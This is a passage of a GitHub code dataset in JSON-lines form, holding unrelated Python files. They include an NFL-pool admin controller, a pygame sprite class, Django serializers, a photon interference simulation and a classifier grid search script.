WeeklyStatsService.get_rankings()\n WeeklyStatsService.get_points_for()\n WeeklyStatsService.get_tiebreaker()\n StandingsService.update_player_pick_points()\n StandingsService.update_team_pick_points()\n\n # redirect on finish\n self.redirect(\"/admin\")\n\n except TypeError:\n # Insert weekly team and player stats\n WeeklyStatsService.get_qb_stats()\n WeeklyStatsService.get_rb_stats()\n WeeklyStatsService.get_rec_stats()\n WeeklyStatsService.get_sack_stats()\n WeeklyStatsService.get_interception_stats()\n WeeklyStatsService.get_rankings()\n WeeklyStatsService.get_points_for()\n WeeklyStatsService.get_tiebreaker()\n StandingsService.update_player_pick_points()\n StandingsService.update_team_pick_points()\n\n # redirect on finish\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-unique-picks.pt\",\n request_method=\"GET\",\n name=\"update-unique-picks\",\n )\n def update_unique_picks(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UniquePicksViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-unique-picks.pt\",\n request_method=\"POST\",\n name=\"update-unique-picks\",\n )\n def update_unique_picks_post(self):\n vm = UniquePicksViewModel()\n vm.from_dict(self.request.POST)\n\n # Find all unique picks for each player\n # team type picks\n picktype = 1\n conf = 0\n div = 1\n\n while conf < 2:\n rank = 1\n UniquePicksService.unique_team_picks(picktype, conf, div, rank)\n rank = 2\n UniquePicksService.unique_team_picks(picktype, conf, div, rank)\n rank = 4\n UniquePicksService.unique_team_picks(picktype, conf, div, rank)\n div += 1\n if div > 4:\n div = 1\n conf += 1\n\n picktype = 9\n conf = 0\n UniquePicksService.unique_team_picks(picktype, conf)\n conf = 1\n UniquePicksService.unique_team_picks(picktype, conf)\n\n picktype = 10\n UniquePicksService.unique_team_picks(picktype)\n\n picktype = 4\n conf = 0\n while picktype < 9:\n UniquePicksService.unique_player_picks(picktype, conf)\n conf += 1\n if conf > 1:\n picktype += 1\n conf = 0\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-paid.pt\",\n request_method=\"GET\",\n name=\"update-paid\",\n )\n def payment(self):\n \"\"\"Update if a player has paid the season fee.\"\"\"\n vm = AdminViewModel()\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n player_list = AccountService.get_all_accounts()\n\n session.close()\n\n return {\"players\": player_list}\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-paid\",\n request_method=\"POST\",\n name=\"update-paid\",\n )\n def update_paid(self):\n \"\"\"POST request to update if a NFLPool player has paid the season fee.\"\"\"\n vm = AdminViewModel()\n vm.from_dict(self.request.POST)\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n AccountService.update_paid(vm.user_id)\n\n session.close()\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-admin.pt\",\n request_method=\"GET\",\n name=\"update-admin\",\n )\n def make_admin(self):\n \"\"\"GET request to make a pool player an administrator.\"\"\"\n vm = AdminViewModel()\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n pool_player_list = AccountService.get_all_accounts()\n\n session.close()\n\n return {\"players\": pool_player_list}\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-admin\",\n request_method=\"POST\",\n name=\"update-admin\",\n )\n def update_admin(self):\n \"\"\"POST request to update the database to make a pool player an administrator.\"\"\"\n vm = AdminViewModel()\n vm.from_dict(self.request.POST)\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n AccountService.update_admin(vm.user_id)\n\n session.close()\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/stats_already_ran.pt\",\n request_method=\"GET\",\n name=\"stats_already_ran\",\n )\n def stats_already_ran(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n return {}\n","repo_name":"prcutler/nflpool","sub_path":"nflpool/controllers/admin_controller.py","file_name":"admin_controller.py","file_ext":"py","file_size_in_byte":16376,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"24882649346","text":"import random\n\nwhile(input(\"input something:\")):\n messages = [ 'It is certain', \n 'It is decidedly so',\n 'Yes definitely',\n 'Repy hazy try again',\n 'Ask again later',\n 'Concentrate and ask again',\n 'My reply is no',\n 'Outlook not so good',\n 'Vety doubtful']\n\n print(messages[random.randint(0,len(messages) - 1)])\n","repo_name":"libaiyu/PE_mark","sub_path":"py_lby/cmdtofile/magic8Ball2.py","file_name":"magic8Ball2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15577648886","text":"from typing import TextIO, Generator\nimport re\nfrom sys import stdin\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass SimpleRange:\n start: int\n end: int\n\n def __contains__(self, other: \"SimpleRange\"):\n return self.start >= other.start and self.end <= other.end\n\n def overlaps(self, other: \"SimpleRange\") -> bool:\n if self.start <= other.start:\n left = self\n right = other\n else:\n left = other\n right = self\n return right.start <= left.end or right in left\n\n\n_input_regex = re.compile(r\"(\\d+)-(\\d+),(\\d+)-(\\d+)\")\n\n\ndef ranges_from_file(\n input_file: TextIO,\n) -> Generator[tuple[SimpleRange, SimpleRange], None, None]:\n for line in input_file:\n start1, end1, start2, end2 = _input_regex.match(line).groups()\n yield SimpleRange(int(start1), int(end1)), SimpleRange(int(start2), int(end2))\n\n\ndef contains_symmetric(range1: SimpleRange, range2: SimpleRange) -> bool:\n return range1 in range2 or range2 in range1\n\n\ndef solution(input_file: TextIO) -> int:\n return sum(contains_symmetric(*r) for r in ranges_from_file(input_file))\n\n\nif __name__ == \"__main__\":\n print(solution(stdin))\n","repo_name":"NoxMar/aoc-2022-python","sub_path":"noxmar_aoc_2022/day04/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7606266850","text":"import pygame\npygame.init\n\nclass sprite(pygame.sprite.Sprite):\n def __init__(self,imagen,x = 0,y = 0,rectangles = False):\n \n self.imagen = imagen\n self.originalImagen = self.imagen\n \n self.rect = self.imagen.get_rect()\n self.rects = []\n \n if rectangles != False:\n for x in range(len(rectangles)):\n self.rects.append(pygame.rect.Rect((rectangles[x][0],rectangles[x][1],rectangles[x][2],rectangles[x][3])))\n \n for num in range(len(self.rects)):\n x = self.rects[num].left\n y = self.rects[num].top\n h = self.rects[num].height\n w = self.rects[num].width\n #pygame.draw.lines(self.imagen,(200,100,200),True,((x,y),(x+w,y),(x+w,y+h),(x,y+h)),2)\n \n self.x = x\n self.y = y\n self.t = self.imagen.get_size()\n def cambiarXY(self,x,y):\n self.x = x\n self.y = y\n def moverIP(self,x,y):\n self.x+=x\n self.y+=y\n def aumentarTamanio(self,escala):\n actual1,actual2 = self.t\n self.imagen = pygame.transform.scale(self.imagen,(int(actual1*escala),int(actual2*escala)))\n self.t = self.imagen.get_size()\n def devolverPintadoEscala(self,escala,pantalla): \n actual1,actual2 = self.t\n escalaImage = pygame.transform.scale(self.imagen,(int(actual1*escala),int(actual2*escala))) \n h,w = int(actual1*escala),int(actual2*escala)\n top = self.y -w/2\n left = self.x -h/2\n pantalla.blit(escalaImage,(left,top))\n def setearHW(self,h,w):\n self.imagen = pygame.transform.scale(self.imagen,(int(h),int(w)))\n def devolverRotada(self,angulo,pantalla):\n \n rotadaImage = pygame.transform.rotate(self.originalImagen,angulo) \n actual1,actual2 = rotadaImage.get_size() \n h,w = int(actual1),int(actual2)\n top = self.y -w/2\n left = self.x -h/2\n pantalla.blit(rotadaImage,(left,top))\n def pintar(self,pantalla):\n actual1,actual2 = self.t\n self.rect.top = self.y -actual2/2\n self.rect.left = self.x -actual1/2\n pantalla.blit(self.imagen,self.rect)\n def cambiarImagen(self,nuevaImagen):\n self.imagen = nuevaImagen\n self.rect = self.imagen.get_rect()\n def generarRotados(self):\n \n self.rotados = []\n for x in range(-90,90):\n imagen = pygame.transform.rotate(self.originalImagen,x)\n w,h = imagen.get_size()\n \n rectImagen =self.x- w/2,self.y -h/2\n \n self.rotados.append([imagen,rectImagen])\n def actualizarRotador(self,pantalla,rotado):\n pantalla.blit(self.rotados[rotado][0],self.rotados[rotado][1])\n def colicionar(self,objeto):\n \n for x in range(len(self.rects)):\n rectActual = pygame.rect.Rect((self.rects[x].left+self.rect.left,self.rects[x].top+self.rect.top,self.rects[x].width,self.rects[x].height))\n rectActualVecino = pygame.rect.Rect((objeto.rect.left,objeto.rect.top,objeto.rect.width,objeto.rect.height))\n \n if rectActual.colliderect(rectActualVecino) == True:\n \n return True\n \n \n return False\n \n \n \n \n ","repo_name":"newtonis/Py-Free-Kick","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2719448887","text":"import datetime\nfrom rest_framework import serializers\nfrom .models import Photo, Cycle, Sensor, Box, Action, Plant, Plot\nfrom django.utils import timezone\n\n\nclass SecondsFromStartMixin():\n def get_seconds_from_cycle_start(self, obj):\n delta = (obj.created - obj.cycle.created)\n return (delta.days * 3600 * 24) + delta.seconds\n\n\nclass PhotoSerializer(SecondsFromStartMixin, serializers.HyperlinkedModelSerializer):\n box = serializers.IntegerField(write_only=True)\n seconds_from_cycle_start = serializers.SerializerMethodField()\n\n class Meta:\n model = Photo\n fields = ('id', 'photo', 'box', 'created', 'seconds_from_cycle_start', 'removed')\n\n def create(self, validated_data):\n box = validated_data.pop('box')\n validated_data['owner'] = self.context['request'].user\n validated_data['cycle'] = Cycle.objects.filter(active=True).filter(box__id=box).order_by('-modified').first()\n return super().create(validated_data)\n\n\nclass PlotSerializer(serializers.HyperlinkedModelSerializer):\n cycle_id = serializers.IntegerField()\n\n class Meta:\n model = Plot\n fields = ('id', 'plot', 'cycle_id', 'created', 'description')\n\n def create(self, validated_data):\n cycle_id = validated_data.pop('cycle_id')\n cycle = Cycle.objects.filter(pk=cycle_id).first()\n validated_data['cycle'] = cycle\n # magic here, because the api should always be POST\n existing = Plot.objects.filter(cycle=cycle, description=validated_data['description']).first()\n if existing:\n existing.plot.delete(save=False)\n existing.plot = validated_data['plot']\n existing.save()\n return existing\n return super().create(validated_data)\n\n\nclass SensorCreateSerializer(serializers.HyperlinkedModelSerializer):\n box = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = Sensor\n fields = ('id', 'box',\n 'sensor_type', 'value_type', 'description', 'position', 'unit', 'value')\n\n def create(self, validated_data):\n box = validated_data.pop('box')\n validated_data['cycle'] = Cycle.objects.filter(active=True).filter(box__id=box).order_by('-modified').first()\n return super().create(validated_data)\n\n\nclass ActionSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Action\n fields = ('action_type', 'decision', 'start_time', 'cycle')\n extra_kwargs = {'cycle': {'write_only': True}}\n\n\nclass BoxSerializer(serializers.ModelSerializer):\n sensors = serializers.SerializerMethodField()\n defaults = serializers.SerializerMethodField()\n\n def get_defaults(self, obj):\n current_cycle = Cycle.objects.filter(active=True).filter(box__id=obj.pk).order_by('-modified').first()\n return {\n 'water': current_cycle.water_start_level,\n 'uv': current_cycle.uv_start_level,\n }\n\n def get_sensors(self, obj):\n current_cycle = Cycle.objects.filter(active=True).filter(box__id=obj.pk).order_by('-modified').first()\n time_threshold = timezone.now() - datetime.timedelta(minutes=6)\n sensor_list = current_cycle.sensor.filter(created__gt=time_threshold).order_by('-modified')\n return SensorSerializer(sensor_list, many=True).data\n\n class Meta:\n model = Box\n fields = ('id', 'sensors', 'defaults')\n\n\nclass BoxActionSerializer(serializers.HyperlinkedModelSerializer):\n action = serializers.SerializerMethodField()\n\n class Meta:\n model = Box\n fields = ('id', 'action')\n\n def get_action(self, obj):\n dt = timezone.now()\n dt = dt.replace(minute=0, second=0, microsecond=0)\n current_cycle = Cycle.objects.filter(active=True).filter(box__id=obj.pk).order_by('-modified').first()\n qs_action = Action.objects.filter(cycle=current_cycle).filter(start_time__gte=dt)\n if not qs_action:\n dt_prev = dt - datetime.timedelta(hours=1)\n prev_actions = Action.objects.filter(cycle=current_cycle).filter(start_time__gte=dt_prev)\n\n # create actions\n actions = []\n for action, _ in Action.ACTION_CHOICES:\n p = prev_actions.filter(action_type=action).order_by('-modified').first()\n if p:\n p = p.decision\n else:\n if action == 'UV light':\n p = current_cycle.uv_start_level\n elif action == 'Water':\n p = current_cycle.water_start_level\n d = {\n 'action_type': action,\n 'start_time': dt,\n 'decision': p,\n 'cycle': current_cycle,\n }\n actions.append(ActionSerializer().create(d))\n else:\n actions = [qs_action.filter(action_type=action).order_by('-modified').first() for action, _ in Action.ACTION_CHOICES]\n return [ActionSerializer(instance=i).data for i in actions]\n\n\nclass PlantSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Plant\n fields = ('id', 'name_en', 'name_la', 'wikipedia_en')\n\n\nclass CycleSerializer(serializers.ModelSerializer):\n plant = PlantSerializer()\n\n class Meta:\n model = Cycle\n fields = ('id', 'start_date', 'name', 'soil', 'plant', 'box')\n\n\nclass SensorSerializer(SecondsFromStartMixin, serializers.ModelSerializer):\n seconds_from_cycle_start = serializers.SerializerMethodField()\n\n class Meta:\n model = Sensor\n fields = ('id', 'cycle', 'sensor_type', 'value_type', 'description',\n 'position', 'unit', 'value', 'created', 'seconds_from_cycle_start')\n","repo_name":"aerospaceresearch/cress-website","sub_path":"cress/box/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36864124545","text":"from abc import ABC, abstractmethod\nfrom warnings import warn\nimport unified_planning as up\nfrom typing import Any, Dict, List, Optional, Tuple\n\n\nclass PortfolioSelectorMixin(ABC):\n \"\"\"Base class that must be extended by an :class:`~unified_planning.engines.Engine` that is also a `PortfolioSelector`.\"\"\"\n\n def __init__(self):\n self.optimality_metric_required = False\n\n @staticmethod\n def is_portfolio_selector() -> bool:\n return True\n\n @staticmethod\n def satisfies(\n optimality_guarantee: \"up.engines.mixins.oneshot_planner.OptimalityGuarantee\",\n ) -> bool:\n \"\"\"\n :param optimality_guarantee: The `optimality_guarantee` that must be satisfied.\n :return: `True` if the `PortfolioSelectorMixin` implementation satisfies the given\n `optimality_guarantee`, `False` otherwise.\n \"\"\"\n return False\n\n def get_best_oneshot_planners(\n self,\n problem: \"up.model.AbstractProblem\",\n max_planners: Optional[int] = None,\n ) -> Tuple[List[str], List[Dict[str, Any]]]:\n \"\"\"\n This method takes an `AbstractProblem`, an operation_mode and optionally an integer\n and returns a Tuple of 2 elements:\n The first one is a list of names of oneshot planners that are currently installed and that can\n solve the problem; the list is ordered following some performance criteria, where\n the first element is the best one.\n\n The second one is a list of Dict[str, Any] and represents the parameters of the planners\n in the first list.\n\n For example, a result like this: (['tamer', 'enhsp-opt'], [{'weight': 0.8}, {}])\n shows that the best result is obtained with 'tamer' with paramseters: {'weight': 0.8}\n and the second best result is obtained with 'enhsp-opt' without parameters (represented by an empty dict)\n\n :param problem: the problem on which the performance of the different planners are tested.\n :param max_planners: if specified, gives a maximum length to the 2 returned lists.\n :return: 2 lists; the first contains the names of the chosen planners, the second one contains the\n parameters to give to the planners in the first list.\n \"\"\"\n assert isinstance(self, up.engines.engine.Engine)\n problem_kind = problem.kind\n if not self.skip_checks and not self.supports(problem_kind):\n msg = f\"{self.name} cannot solve this kind of problem!\"\n if self.error_on_failed_checks:\n raise up.exceptions.UPUsageError(msg)\n else:\n warn(msg)\n if not problem_kind.has_quality_metrics() and self.optimality_metric_required:\n msg = f\"The problem has no quality metrics but the planners are required to be optimal!\"\n raise up.exceptions.UPUsageError(msg)\n if max_planners is not None and max_planners <= 0:\n raise up.exceptions.UPUsageError(\n f\"The specified number of max_planners must be > 0 but {max_planners} is given!\"\n )\n return self._get_best_oneshot_planners(problem, max_planners)\n\n @abstractmethod\n def _get_best_oneshot_planners(\n self,\n problem: \"up.model.AbstractProblem\",\n max_planners: Optional[int] = None,\n ) -> Tuple[List[str], List[Dict[str, Any]]]:\n \"\"\"Method called by the PortfolioSelectorMixin.get_best_oneshot_planners method.\"\"\"\n raise NotImplementedError\n","repo_name":"aiplan4eu/unified-planning","sub_path":"unified_planning/engines/mixins/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"54"} +{"seq_id":"19171351638","text":"import nltk\nfrom nltk.corpus import wordnet\n\ndef findSynonyms(text):\n synonyms = []\n antonyms = []\n\n for syn in wordnet.synsets(\"not\"):\n for l in syn.lemmas():\n synonyms.append(l.name())\n if l.antonyms():\n antonyms.append(l.antonyms()[0].name())\n return synonyms, antonyms\n\nif True:\n temp=findSynonyms(\"hello\")\n print(temp[0])\n print(temp[1])","repo_name":"marcus-tam/COSC310_ChatBot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12882685838","text":"# PPt from images after apply logo on each image by maintain aspect ratio of original images\nimport os\nfrom wand.image import Image\nfrom pptx import Presentation\nfrom pptx.util import Inches\n\n# Original Image resizing by maintaining aspect ratio\n\ndef resize_original_image(image1, new_width):\n width, height = image1.size\n aspect_ratio = width/height\n new_height = int(aspect_ratio*new_width)\n image1.resize(new_width, new_height)\n return image1\n\n# Logo Image resizing\ndef resize_original_logo(image2, new_width):\n width, height = image2.size\n aspect_ratio = width/height\n new_height = 15\n image2.resize(new_width, new_height)\n return image2\n\n\n# list all images from a given folder\nimage_directory = \"Resources\"\nimage_list = os.listdir(image_directory)\nimage_list = image_list[0:5]\n\n\n\nprs = Presentation()\nbullet_slide_layout = prs.slide_layouts[1]\n\nwith Image(filename=\"Resources/nike_black.png\") as img1:\n img1 = resize_original_logo(img1, 75)\n for image in image_list:\n Resource_file = \"Resources/\"+image\n water_mark_image_path = \"output/\"+image\n with Image(filename=Resource_file) as img2:\n img2 = resize_original_image(img2, 200)\n\n # Apply watermark process on original image one by one\n img2.composite_channel('all_channels', img1, 'dissolve', 4, 4)\n\n # Adding watermark images on ppt slide one by one\n img2.save(filename=water_mark_image_path)\n slide = prs.slides.add_slide(bullet_slide_layout)\n shapes = slide.shapes\n title_shape = shapes.title\n body_shape = shapes.placeholders[1]\n title_shape.text = 'Sample Title 1'\n tf = body_shape.text_frame\n tf.text = 'Sample Subtitle 1'\n left = Inches(1)\n top = Inches(2.8)\n pic = slide.shapes.add_picture(water_mark_image_path, left, top)\nprs.save('Resources/watermark_images.pptx')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Ranjana151/PPT_From_Images","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29068246240","text":"\"\"\"\nHOM between Dario SPDC idler and my write photon\nThis does only require beam splitter counts, and no time bin photons\nHowever, 4fold heralding is required\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\np = {\"bsplit\": 0.5, # Beam splitter ratio\n \n \"eta_606\": 0.5, # 606 nm detector quantum efficiency\n \"eta_1436\": 0.8, # 1436 nm detector quantum efficiency\n # \"eta_1436\": 0.8*0.5, # 1436 nm detector quantum efficiency\n \"eta_780\": 0.5, # 780 nm detector quantum efficiency\n \n \"eta_D_int\": 0.45, # DLCZ intrinsic retrieval efficiency\n \"eta_D_cou_r\": 0.85, # DLCZ read coupling efficiency\n \"eta_D_tr_r\": 0.95, # DLCZ read trans. eff. incl. filters\n \"eta_D_cou_w\": 0.75, # DLCZ write coupling efficiency\n \"eta_D_tr_w\": 0.95*0.3,# DLCZ write trans. eff. incl. filters\n \"eta_D_cav\": 0.8, # DLCZ cavity escape efficiency\n \"alpha\": 2*10/np.pi, # DLCZ read enhancement\n \"D_D\": 1.5/(9+1.5), # DLCZ duty cicle\n \"R_D\": 1/(1.5*10**-6), # DLCZ write trial repetition rate\n \"p_spin\": 0.01, # DLCZ Spinwave creation prop.\n \n \"eta_QFC\": 0.15, # QFC total efficiency fiber-to-fiber\n \n \"eta_SPDC_cou_s\": 0.7, # SPDC signal coupling efficiency\n \"eta_SPDC_tr_s\": 1, # SPDC signal trans. eff. incl. filters\n \"eta_SPDC_cou_i\": 0.7, # SPDC idler coupling efficiency\n \"eta_SPDC_tr_i\": 0.5, # SPDC idler trans. eff. incl. filters\n \"eta_SPDC_cav\": 0.5, # SPDC cavity escape efficiency\n \"g_SPDC\": 2/10, # SPDC idler autocorrelation\n \"D_SPDC\": 0.5, # SPDC duty cicly\n \n # Probability of having SPDC photon pair generated per second\n # There is a factor 2 at the end which should be 1/D_SPDC\n \"p_pair\": 800/(0.8*0.5*0.5*0.7*0.5*0.5*0.7)*2, \n \n \"eta\": 0.9 # Photon overlap factor \n} \n\n\n#%% Simulation function definition\n\ndef sim(p, **kwarg):\n\n for k in kwarg:\n p[k] = kwarg[k]\n \n # Intrinsic DLCZ retrieval efficiency with read cavity\n eta_D_int_eff = p[\"eta_D_int\"]*p[\"alpha\"]/(1+p[\"eta_D_int\"]*(p[\"alpha\"]-1))\n \n # Multiplicative detection efficiency\n eta_det = np.sqrt(p[\"bsplit\"]*(1-p[\"bsplit\"])*p[\"eta_1436\"]**2)\n \n # Probability to find a heralded DLCZ write photon in front of the beam splitter \n p_D = p[\"p_spin\"]*p[\"eta_D_cou_w\"]*p[\"eta_D_tr_w\"]*p[\"eta_D_cav\"]**2*\\\n eta_D_int_eff*p[\"eta_D_tr_r\"]*p[\"eta_D_cou_r\"]*p[\"eta_QFC\"]*p[\"eta_780\"]\n \n # Probability to find an heralded idler photon in front of the beam splitter\n p_SPDC = p[\"p_pair\"]*p[\"eta_SPDC_cav\"]**2*p[\"eta_SPDC_cou_i\"] * \\\n p[\"eta_SPDC_tr_i\"]*p[\"eta_SPDC_tr_s\"]*p[\"eta_SPDC_cou_s\"]*p[\"eta_606\"]*400e-9 \n \n # DLCZ cross correlation function g_wr\n g_D_wr = 1 +(eta_D_int_eff*(1-p[\"p_spin\"]))/(p[\"p_spin\"]*eta_D_int_eff + \\\n + p[\"p_spin\"]*(1-eta_D_int_eff)*0.5)\n \n # DLCZ autocorrelation function g_rr,w, based on the crosscorrelation\n g_D = 4/(g_D_wr-1)\n \n # SPDC autocorrelation function g_rr\n g_SPDC = p[\"g_SPDC\"]\n \n # Probability of coincidence click per trial, indistinguishable case\n p_12 = p_SPDC**2*eta_det**2*g_SPDC + p_D**2*eta_det**2*g_D + 2*eta_det**2*p_SPDC*p_D*(1-p[\"eta\"])\n \n # Probability of coincidence click per trial, distinguishable case\n p_12_0 = p_SPDC**2*eta_det**2*g_SPDC + p_D**2*eta_det**2*g_D + 2*eta_det**2*p_SPDC*p_D\n \n # Visibility\n V = 1-p_12/p_12_0\n \n # Mysterious parameter of coincidence count rate in distinghuishable case.\n X = p[\"D_D\"]*p[\"D_SPDC\"]*p[\"R_D\"]*p_12_0\n \n return g_D, g_D_wr,V,X,p_12_0,p_12, p_D, p_SPDC\n\n#%% Some simulations\n\np_spinwave = np.linspace(0.005,0.2,100) # Detected DLCZ write photon rate per second\nplt.close(1)\nfig, ax = plt.subplots(1,3, num = 1, figsize = (12,4))\n\npara = \"eta_QFC\" #[0.99,0.9,0.8]\n\n \nfor scanner in [0.15]:\n \n p_c = p.copy() \n \n p_c[para] = scanner\n label = str(scanner)\n\n d = pd.DataFrame(np.array([sim(p_c, **{\"p_spin\":p}) for p in p_spinwave]), \n columns = [\"g_D\", \"g_D_wr\",\"V\",\"X\",\"p_12_0\",\"p_12\", \"p_D\", \"p_SPDC\"])\n print(d.max())\n ax[0].plot(d[\"X\"]*3600,d[\"V\"], label = label)\n ax[0].set_xlabel(\"Coincidences dist. case (1/h)\")\n ax[0].set_ylabel(\"Visibility\")\n \n ax[2].plot(d[\"X\"]*3600,d[\"g_D\"], label = label)\n ax[2].set_xlabel(\"Coincidences dist. case (1/h)\")\n ax[2].set_ylabel(r\"$g_{r,r}^{(2)}$ DLCZ\")\n \n ax[1].plot(p_spinwave*100,d[\"V\"], label = label)\n ax[1].set_xlabel(\"p DLCZ (%)\")\n ax[1].set_ylabel(\"Visibility\")\n\nax[0].set_xlim((0,75))\nax[2].set_xlim((0,75))\nax[0].legend(title = para)\nplt.tight_layout()\nplt.show()\n\nplt.savefig(\"output/sim.png\", dpi = 300, bbox_inches = \"tight\")\n\n\n\n\n\n\n\n","repo_name":"LukasHeller/simulations","sub_path":"HOM_with_Dario_countestimate.py","file_name":"HOM_with_Dario_countestimate.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"146084601","text":"#!/usr/bin/env python\n\n'''\nConducts a grid search of the hyperparameters used by the classifiers in Pythia (logreg, svm, xgboost)\n\nThe output is recorded by Sacred if a MongoObserver is passed in via command line (-m HOST:PORT:MY_DB)\n\nInput\nexperimentdatafile (required) : Path to file containing data features from Pythia's master pipeline\nsvmsearch : Boolean value to execute Grid Search on Support Vector Machine model\nsvmparams : Grid Search parameters for Support Vector Machine model\nlogregsearch : Boolean value to execute Grid Search on Logistic Regression model\nlogregparams : Grid Search parameters for Logistic Regression model\nxgbsearch : Boolean value to execute Grid Search on XGBoost model\nxgbparams : Grid Search parameters for XGBoost model\nallscores : Boolean value to print all calculated Fscores to stderr and pass to Sacred\n\nOutput\nresults (dict) : Dictionary containing best score, best parameters, best estimator from Grid Search\nand metadata about the data file that was examined by Grid Search. Results dict is recorded by Sacred.\n'''\n\nfrom sklearn import svm, linear_model, grid_search\nimport xgboost\nimport pickle\nimport os\nimport sys\n\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\n\ndef set_up_xp():\n\n ex_name = 'pythia_gridsearch'\n ex = Experiment(ex_name)\n\n return ex\n\nxp = set_up_xp()\n\n@xp.capture\ndef conduct_grid_search(experimentdatafile,svmsearch,svmparams,logregsearch,logregparams,xgbsearch,xgbparams,allscores):\n\n # Ensure that only one classifier has been selected to grid search\n test = [svmsearch,logregsearch,xgbsearch]\n if test.count(True) == 0 or test.count(True) > 1:\n print(\"Error: Grid Search requires one classifier\\n\")\n quit()\n\n # Initiate classifiers and parameters as needed \n if svmsearch:\n svmmodel = svm.SVC()\n classifier=['SVM', svmmodel, svmparams]\n elif logregsearch:\n logregmodel = linear_model.LogisticRegression()\n classifier=[\"Logistic Regression\", logregmodel, logregparams]\n elif xgbsearch:\n xgbmodel = xgboost.XGBClassifier()\n classifier=[\"XGBoost\", xgbmodel, xgbparams]\n\n print(\"Searching \" + classifier[0] + \" parameters...\", file=sys.stderr)\n\n # Load data files\n lunchbox = pickle.load(open(experimentdatafile,\"rb\"))\n\n # Conduct grid search of selected classifier\n clf = grid_search.GridSearchCV(classifier[1], classifier[2])\n clf.fit(lunchbox['train_data'], lunchbox['train_target'])\n\n results = dict()\n results[\"gridsearch_classifier\"] = classifier[0]\n results[\"gridsearch_best_params\"] = clf.best_params_\n results[\"gridsearch_best_score\"] = clf.best_score_\n results[\"gridsearch_best_estimator\"] = str(clf.best_estimator_)\n results['directory'] = lunchbox['directory']\n results['features'] = lunchbox['features']\n results['algorithms'] = lunchbox['algorithms']\n results['parameters'] = lunchbox['parameters']\n\n # Print all Grid Search results\n print(\"Best Estimator\",clf.best_estimator_, file=sys.stderr)\n print(\"Best Score\", clf.best_score_, file=sys.stderr)\n print(\"Best Parameters\", clf.best_params_, file=sys.stderr)\n\n if allscores:\n print(\"All Scores\", file=sys.stderr)\n for score in clf.grid_scores_:\n print(score, file=sys.stderr)\n results['allscores'] = str(clf.grid_scores_)\n\n return results\n\n@xp.config\ndef config_variables():\n # Path to file containing data features\n experimentdatafile = \"data/experimentdatafile.pkl\"\n\n # Boolean value to execute Grid Search on Support Vector Machine model\n svmsearch = False\n\n # Grid Search parameters for Support Vector Machine model\n svmparams = {'kernel':['linear', 'rbf', 'poly'], \\\n 'C':[0.001, 0.01, 0.1, 1, 10, 100, 1000], \\\n 'gamma': ['auto', 0.01, 0.001, 0.0001, 0.0001]}\n\n # Boolean value to execute Grid Search on Logistic Regression model\n logregsearch = False\n\n # Grid Search parameters for Logistic 